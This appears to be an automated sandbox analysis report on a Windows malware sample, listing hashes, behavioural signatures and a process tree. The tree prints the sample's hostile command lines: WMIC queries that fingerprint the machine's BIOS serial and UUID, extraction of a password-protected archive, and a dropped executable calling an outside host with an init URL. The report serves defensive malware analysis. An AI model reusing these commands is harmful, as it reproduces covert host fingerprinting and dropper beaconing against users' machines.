Analysis
-
max time kernel
169s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2023 18:07
Static task
static1
Behavioral task
behavioral1
Sample
0a9b033acd106ba0507f91884ef93515.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
0a9b033acd106ba0507f91884ef93515.exe
Resource
win10v2004-20231215-en
General
-
Target
0a9b033acd106ba0507f91884ef93515.exe
-
Size
406KB
-
MD5
0a9b033acd106ba0507f91884ef93515
-
SHA1
fc11c2a1ab2711f2b74afe1ea48b84ae487c75ba
-
SHA256
05ef60df87c1f63c4290520a2d9cb27a4e004579ff0a2ca3e48c46db5ad1dcb2
-
SHA512
dd72c17e602a9fd6604a545982350828533d9d824d5794add606159e9156d97b2d45d845b23022ea113249bed1a2663b6ea7e5fb51dcce343d0bd7cfcadf33b2
-
SSDEEP
12288:MA0i50G7eAqDwV4Iu/cRQn5uFNUwbhG+bzv:MAfyGSAqg4IUcRyQNUwv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3176 7za.exe 3616 setupcl.exe -
Loads dropped DLL 5 IoCs
pid Process 4852 0a9b033acd106ba0507f91884ef93515.exe 4852 0a9b033acd106ba0507f91884ef93515.exe 4852 0a9b033acd106ba0507f91884ef93515.exe 4852 0a9b033acd106ba0507f91884ef93515.exe 4852 0a9b033acd106ba0507f91884ef93515.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3068 3616 WerFault.exe 103 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2032 WMIC.exe Token: SeSecurityPrivilege 2032 WMIC.exe Token: SeTakeOwnershipPrivilege 2032 WMIC.exe Token: SeLoadDriverPrivilege 2032 WMIC.exe Token: SeSystemProfilePrivilege 2032 WMIC.exe Token: SeSystemtimePrivilege 2032 WMIC.exe Token: SeProfSingleProcessPrivilege 2032 WMIC.exe Token: SeIncBasePriorityPrivilege 2032 WMIC.exe Token: SeCreatePagefilePrivilege 2032 WMIC.exe Token: SeBackupPrivilege 2032 WMIC.exe Token: SeRestorePrivilege 2032 WMIC.exe Token: SeShutdownPrivilege 2032 WMIC.exe Token: SeDebugPrivilege 2032 WMIC.exe Token: SeSystemEnvironmentPrivilege 2032 WMIC.exe Token: SeRemoteShutdownPrivilege 2032 WMIC.exe Token: SeUndockPrivilege 2032 WMIC.exe Token: SeManageVolumePrivilege 2032 WMIC.exe Token: 33 2032 WMIC.exe Token: 34 2032 WMIC.exe Token: 35 2032 WMIC.exe Token: 36 2032 WMIC.exe Token: SeIncreaseQuotaPrivilege 2032 WMIC.exe Token: SeSecurityPrivilege 2032 WMIC.exe Token: SeTakeOwnershipPrivilege 2032 WMIC.exe Token: SeLoadDriverPrivilege 2032 WMIC.exe Token: SeSystemProfilePrivilege 2032 WMIC.exe Token: SeSystemtimePrivilege 2032 WMIC.exe Token: SeProfSingleProcessPrivilege 2032 WMIC.exe Token: SeIncBasePriorityPrivilege 2032 WMIC.exe Token: SeCreatePagefilePrivilege 2032 WMIC.exe Token: SeBackupPrivilege 2032 WMIC.exe Token: SeRestorePrivilege 2032 WMIC.exe Token: SeShutdownPrivilege 2032 WMIC.exe Token: SeDebugPrivilege 2032 WMIC.exe Token: SeSystemEnvironmentPrivilege 2032 WMIC.exe Token: SeRemoteShutdownPrivilege 2032 WMIC.exe Token: SeUndockPrivilege 2032 WMIC.exe Token: SeManageVolumePrivilege 2032 WMIC.exe Token: 33 2032 WMIC.exe Token: 34 2032 WMIC.exe Token: 35 2032 WMIC.exe Token: 36 2032 WMIC.exe Token: SeIncreaseQuotaPrivilege 4912 WMIC.exe Token: SeSecurityPrivilege 4912 WMIC.exe Token: SeTakeOwnershipPrivilege 4912 WMIC.exe Token: SeLoadDriverPrivilege 4912 WMIC.exe Token: SeSystemProfilePrivilege 4912 WMIC.exe Token: SeSystemtimePrivilege 4912 WMIC.exe Token: SeProfSingleProcessPrivilege 4912 WMIC.exe Token: SeIncBasePriorityPrivilege 4912 WMIC.exe Token: SeCreatePagefilePrivilege 4912 WMIC.exe Token: SeBackupPrivilege 4912 WMIC.exe Token: SeRestorePrivilege 4912 WMIC.exe Token: SeShutdownPrivilege 4912 WMIC.exe Token: SeDebugPrivilege 4912 WMIC.exe Token: SeSystemEnvironmentPrivilege 4912 WMIC.exe Token: SeRemoteShutdownPrivilege 4912 WMIC.exe Token: SeUndockPrivilege 4912 WMIC.exe Token: SeManageVolumePrivilege 4912 WMIC.exe Token: 33 4912 WMIC.exe Token: 34 4912 WMIC.exe Token: 35 4912 WMIC.exe Token: 36 4912 WMIC.exe Token: SeIncreaseQuotaPrivilege 4912 WMIC.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3616 setupcl.exe 3616 setupcl.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4852 wrote to memory of 2032 4852 0a9b033acd106ba0507f91884ef93515.exe 91 PID 4852 wrote to memory of 2032 4852 0a9b033acd106ba0507f91884ef93515.exe 91 PID 4852 wrote to memory of 2032 4852 0a9b033acd106ba0507f91884ef93515.exe 91 PID 4852 wrote to memory of 4912 4852 0a9b033acd106ba0507f91884ef93515.exe 94 PID 4852 wrote to memory of 4912 4852 0a9b033acd106ba0507f91884ef93515.exe 94 PID 4852 wrote to memory of 4912 4852 0a9b033acd106ba0507f91884ef93515.exe 94 PID 4852 wrote to memory of 4452 4852 0a9b033acd106ba0507f91884ef93515.exe 96 PID 4852 wrote to memory of 4452 4852 0a9b033acd106ba0507f91884ef93515.exe 96 PID 4852 wrote to memory of 4452 4852 0a9b033acd106ba0507f91884ef93515.exe 96 PID 4852 wrote to memory of 1496 4852 0a9b033acd106ba0507f91884ef93515.exe 98 PID 4852 wrote to memory of 1496 4852 0a9b033acd106ba0507f91884ef93515.exe 98 PID 4852 wrote to memory of 1496 4852 0a9b033acd106ba0507f91884ef93515.exe 98 PID 4852 wrote to memory of 3176 4852 0a9b033acd106ba0507f91884ef93515.exe 100 PID 4852 wrote to memory of 3176 4852 0a9b033acd106ba0507f91884ef93515.exe 100 PID 4852 wrote to memory of 3176 4852 0a9b033acd106ba0507f91884ef93515.exe 100 PID 4852 wrote to memory of 3616 4852 0a9b033acd106ba0507f91884ef93515.exe 103 PID 4852 wrote to memory of 3616 4852 0a9b033acd106ba0507f91884ef93515.exe 103 PID 4852 wrote to memory of 3616 4852 0a9b033acd106ba0507f91884ef93515.exe 103 PID 3616 wrote to memory of 1804 3616 setupcl.exe 104 PID 3616 wrote to memory of 1804 3616 setupcl.exe 104 PID 3616 wrote to memory of 1804 3616 setupcl.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a9b033acd106ba0507f91884ef93515.exe"C:\Users\Admin\AppData\Local\Temp\0a9b033acd106ba0507f91884ef93515.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get UUID /FORMAT:textvaluelist.xsl2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get Version /FORMAT:textvaluelist.xsl2⤵PID:4452
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get Name /FORMAT:textvaluelist.xsl2⤵PID:1496
-
-
C:\Users\Admin\AppData\Local\Temp\nsaF908.tmp\7za.exe7za.exe e -y -p"e255c46bdcbb0ec4750c9e35e39980d8" [RANDOM_STRING].7z2⤵
- Executes dropped EXE
PID:3176
-
-
C:\Users\Admin\AppData\Local\Temp\nsaF908.tmp\setupcl.exe"C:\Users\Admin\AppData\Local\Temp\nsaF908.tmp\setupcl.exe" /initurl http://sub.nuidal.info/init/0a9b033acd106ba0507f91884ef93515/:uid:? /affid "-" /id "0" /name " " /uniqid 0a9b033acd106ba0507f91884ef93515 /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic bios get serialnumber, version3⤵PID:1804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 11883⤵
- Program crash
PID:3068
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3616 -ip 36161⤵PID:1176
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
460KB
MD5ef1b30ba739ae86668c383a3c9a0065a
SHA102e5fd14e7961fc50aa9c96d5d4778d2d26fa429
SHA2565c9cfb9a3674b9e91800016054788e315da62f8301a144142dae6cf8321b2d49
SHA51237488304d1fe7d43fbce61f4d2a1c9896843034df737ee44a8cdd18cca3971606776a3f966838fe324df7ba9cad3a11f8ec65cf51525316dd5a3fdefe12865d1
-
Filesize
98KB
MD595fbd1c8615032eb21e03ea1cf863bf4
SHA1a884635d8d1898d821ab467eb3004ba9c626bf0b
SHA25657a21477297d04b1a2c05a6012b40dc241338a53942c385eeb5b4a4ed1362e5e
SHA5129f8e2173ce60a995127b030433071e0cc596d1c2fb768d6a96fdd15824947c9476208bb432252d74a51e5a6bdc75ce903dfa02ff9679a2dfa24d263d489240bf
-
Filesize
80KB
MD57086fff49b1e644783274357b341b80e
SHA1096cd074bd9075f83014cd1fe11d93f27dada4ef
SHA25693ba3306a4cb1ecac3a1efef43481366ca3b09ffba8d79ce3b324b56b7cdab7f
SHA512756072c2c50b1ad222278b7eb97563518dd6019ce2dfc1c325ee74250c8b3436945ad6a439cdcc5129ff2523d712e9c7290b7d4a3132b97f7f55a7d8d1560750
-
Filesize
8KB
MD5b8be6632a7dc8136ff01338be40fe701
SHA1043fa16929b2af5ed5c1c59b4035a10cf765fb43
SHA256289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085
SHA512403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8
-
Filesize
193KB
MD5bbb978e54532b56c704f61fb335613bd
SHA12f8442e51b50eced927cdf4b04df69f66475a3ca
SHA25699bc8c522304d2bce8b33ba999be219b43b799cafddc953b24cb9af771b4f15c
SHA512366d2e0cf28d9d23246b5bde811e3acb4f019e23dfe55d9977483ae711ca98294b521ac8d86c24000df6d0e787df75523b069a02ce17fff9224911557503a58a